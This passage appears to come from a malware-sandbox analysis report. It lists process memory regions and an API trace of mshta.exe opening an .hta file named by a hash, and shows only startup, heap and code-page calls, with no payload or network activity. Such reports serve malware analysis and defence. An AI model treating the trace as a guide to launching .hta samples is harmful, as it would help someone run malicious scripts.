= 0x354ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 391 start_va = 0x3560000 end_va = 0x35dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003560000" filename = "" Region: id = 392 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 393 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 394 start_va = 0x1f40000 end_va = 0x1f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 395 start_va = 0x35e0000 end_va = 0x1b5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 396 start_va = 0x1b5e0000 end_va = 0x1bcaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b5e0000" filename = "" Region: id = 397 start_va = 0x1bcb0000 end_va = 0x1bdb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bcb0000" filename = "" Region: id = 398 start_va = 0x1be00000 end_va = 0x1befffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001be00000" filename = "" Region: id = 399 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 400 start_va = 0x7feedfc0000 end_va = 0x7feeee9bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll") Region: id = 401 start_va = 0x7fffff10000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff10000" filename = "" Region: id = 402 start_va = 0x7fffff00000 end_va = 0x7fffff0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff00000" filename = "" Region: id = 403 start_va = 0x2170000 end_va = 0x222ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 404 start_va = 0x1f40000 end_va = 0x1f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 405 start_va = 0x7ff00170000 end_va = 0x7ff0017ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ff00170000" filename = "" Region: id = 406 start_va = 0x7feed590000 end_va = 0x7feedfb2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll") Region: id = 407 start_va = 0x7feecee0000 end_va = 0x7feed584fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll") Region: id = 408 start_va = 0x1f50000 end_va = 0x1f51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f50000" filename = "" Region: id = 409 start_va = 0x7ff00180000 end_va = 0x7ff0018ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ff00180000" filename = "" Region: id = 410 start_va = 0x7fef1790000 end_va = 0x7fef1913fff monitored = 1 entry_point = 0x7fef1876c60 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorjit.dll") Region: id = 411 start_va = 0x1f60000 end_va = 0x1f60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f60000" filename = "" Region: id = 412 start_va = 0x2680000 end_va = 0x268ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 413 start_va = 0x2760000 end_va = 0x276ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 414 start_va = 0x2690000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002690000" filename = "" Region: id = 415 start_va = 0x26a0000 end_va = 0x26affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 416 start_va = 0x7ff00190000 end_va = 0x7ff001cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ff00190000" filename = "" Region: id = 417 start_va = 0x26b0000 end_va = 0x26bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 418 start_va = 0x26c0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 419 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 420 start_va = 0x26e0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 421 start_va = 0x26f0000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 422 start_va = 0x2700000 end_va = 0x270ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 423 start_va = 0x1bf00000 end_va = 0x1c010fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bf00000" filename = "" Region: id = 424 start_va = 0x26e0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 425 start_va = 0x2710000 end_va = 0x271ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 426 start_va = 0x2720000 end_va = 0x2730fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002720000" filename = "" Region: id = 476 start_va = 0x1bf00000 end_va = 0x1c0bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bf00000" filename = "" Region: id = 477 start_va = 0x1c0c0000 end_va = 0x1c9effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Thread: id = 1 os_tid = 0xf14 [0039.986] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f8b0 | out: lpSystemTimeAsFileTime=0x30f8b0*(dwLowDateTime=0x704a01a0, dwHighDateTime=0x1d809f7)) [0039.986] GetCurrentProcessId () returned 0xf10 [0039.986] GetCurrentThreadId () returned 0xf14 [0039.986] GetTickCount () returned 0x1c20881 [0039.986] QueryPerformanceCounter (in: lpPerformanceCount=0x30f8b8 | out: lpPerformanceCount=0x30f8b8*=2962361199612) returned 1 [0039.986] GetModuleHandleW (lpModuleName=0x0) returned 0xff7a0000 [0039.986] GetStartupInfoW (in: lpStartupInfo=0x30f730 | out: lpStartupInfo=0x30f730*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0039.986] GetVersionExW (in: lpVersionInformation=0x30f7a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x30f7a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0039.986] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x650000 [0039.987] HeapSetInformation (HeapHandle=0x650000, HeapInformationClass=0x0, HeapInformation=0x30f700, HeapInformationLength=0x4) returned 1 [0039.988] HeapSetInformation (HeapHandle=0x650000, HeapInformationClass=0x0, HeapInformation=0x30f700, HeapInformationLength=0x4) returned 1 [0039.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2d8) returned 0x654ba0 [0039.989] GetStartupInfoW (in: lpStartupInfo=0x30f670 | out: lpStartupInfo=0x30f670*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xff7a0000, hStdOutput=0xff7a4214, hStdError=0x654ba0)) [0039.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x700) returned 0x654e80 [0039.989] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0039.989] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0039.989] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0039.989] SetHandleCount (uNumber=0x20) returned 0x20 [0039.989] GetCommandLineA () returned="\"C:\\Windows\\System32\\mshta.exe\" \"C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta\" " [0039.989] GetEnvironmentStringsW () returned 0x4074a0* [0039.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1376, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1376 [0039.989] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x560) returned 0x655590 [0039.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1376, lpMultiByteStr=0x655590, cbMultiByte=1376, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1376 [0039.989] FreeEnvironmentStringsW (penv=0x4074a0) returned 1 [0039.990] GetLastError () returned 0x0 [0039.990] SetLastError (dwErrCode=0x0) [0039.990] GetLastError () returned 0x0 [0039.990] SetLastError (dwErrCode=0x0) [0039.990] GetLastError () returned 0x0 [0039.990] SetLastError (dwErrCode=0x0) [0039.990] GetACP () returned 0x4e4 [0039.990] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x220) returned 0x655b00 [0039.990] GetLastError () returned 0x0 [0039.990] SetLastError (dwErrCode=0x0) [0039.990] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x30f600 | out: lpCPInfo=0x30f600) returned 1 [0039.990] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x30f0a0 | out: lpCPInfo=0x30f0a0) returned 1 [0039.990] GetLastError () returned 0x0 [0039.990] SetLastError (dwErrCode=0x0) [0039.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f0c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0039.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f0c0, cbMultiByte=256, lpWideCharStr=0x30eda0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䵹쯄୆") returned 256 [0039.990] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䵹쯄୆", cchSrc=256, lpCharType=0x30f3c0 | out: lpCharType=0x30f3c0) returned 1 [0039.990] GetLastError () returned 0x0 [0039.990] SetLastError (dwErrCode=0x0) [0039.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f0c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0039.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f0c0, cbMultiByte=256, lpWideCharStr=0x30ed40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0039.990] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0039.990] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x30eb30, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0039.990] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x30f1c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¯\x01", lpUsedDefaultChar=0x0) returned 256 [0039.990] GetLastError () returned 0x0 [0039.990] SetLastError (dwErrCode=0x0) [0039.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f0c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0039.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f0c0, cbMultiByte=256, lpWideCharStr=0x30ed40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0039.990] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0039.990] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x30eb30, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0039.991] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x30f2c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0039.991] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xff7aa700, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0039.991] GetLastError () returned 0x0 [0039.991] SetLastError (dwErrCode=0x0) [0039.991] GetLastError () returned 0x0 [0039.991] SetLastError (dwErrCode=0x0) [0039.991] GetLastError () returned 0x0 [0039.991] SetLastError (dwErrCode=0x0) [0039.991] GetLastError () returned 0x0 [0039.991] SetLastError (dwErrCode=0x0) [0039.991] GetLastError () returned 0x0 [0039.991] SetLastError (dwErrCode=0x0) [0039.991] GetLastError () returned 0x0 [0039.991] SetLastError (dwErrCode=0x0) [0039.991] GetLastError () returned 0x0 [0039.991] SetLastError (dwErrCode=0x0) [0039.991] GetLastError () returned 0x0 [0039.991] SetLastError (dwErrCode=0x0) [0039.991] GetLastError () returned 0x0 [0039.991] SetLastError (dwErrCode=0x0) [0039.991] GetLastError () returned 0x0 [0039.991] SetLastError (dwErrCode=0x0) [0039.991] GetLastError () returned 0x0 [0039.991] SetLastError (dwErrCode=0x0) [0039.991] GetLastError () returned 0x0 [0039.991] SetLastError (dwErrCode=0x0) [0039.991] GetLastError () returned 0x0 [0039.991] SetLastError (dwErrCode=0x0) [0039.991] GetLastError () returned 0x0 [0039.992] SetLastError (dwErrCode=0x0) [0039.992] GetLastError () returned 0x0 [0039.992] SetLastError (dwErrCode=0x0) [0039.992] GetLastError () returned 0x0 [0039.992] SetLastError (dwErrCode=0x0) [0039.992] GetLastError () returned 0x0 [0039.992] SetLastError (dwErrCode=0x0) [0039.992] GetLastError () returned 0x0 [0039.992] SetLastError (dwErrCode=0x0) [0039.992] GetLastError () returned 0x0 [0039.992] SetLastError (dwErrCode=0x0) [0039.992] GetLastError () returned 0x0 [0039.992] SetLastError (dwErrCode=0x0) [0039.992] GetLastError () returned 0x0 [0039.992] SetLastError (dwErrCode=0x0) [0039.992] GetLastError () returned 